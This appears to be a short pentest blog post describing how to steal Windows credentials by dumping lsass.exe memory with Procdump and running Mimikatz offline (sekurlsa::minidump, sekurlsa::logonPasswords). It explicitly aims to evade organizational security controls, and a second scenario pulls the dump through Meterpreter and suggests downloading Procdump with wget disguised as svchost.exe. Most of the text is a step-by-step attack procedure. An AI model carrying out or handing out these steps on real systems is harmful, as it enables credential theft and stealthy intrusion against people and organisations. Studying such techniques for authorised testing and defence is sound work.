Mimikatz Part I Procdump On Lsass
This post is about extracting passwords in stealthmode by using Mimikatz offline on a Procdump of Lsass we can successfully bypass the security controls of most organizations that obviously are aware of and looking for any instance of Mimikatz during a pentest.
Here are the steps involved:
- Move Procdump.exe to the victim VM
- Procdump lsass.exe
- Move mimikatz to the victim VM
- Mimikatz lsassdump.dmp > sekurlsa::minidump lsassdump.dmp > sekurlsa::logonPasswords
Let’s get started.
Run procdump on lsass
Move mimikatz to victim VM
Send from Linux/Windows And Receive from Linux/Windows
Here you can see the return output of mimikatz on our lsassdump. The password is there, I’m not including it!.
It’s as simple as that.
Scenario II: Downloading .dmp file remotely using Meterpreter
The objective here is to get the procdump file from the victim Windows XP using the command download c:\bin\lsassdump.dmp
Note that double backslashes are needed in the filepath
Now this is assuming that Sysinternals Procdump is installed on the victim XP. It is in my case. As an alternative one could upload Procdump to the victim easily by downloading it locally on the XP using something like wget procdumpdownloadurl > svchost.exe to be sneaky..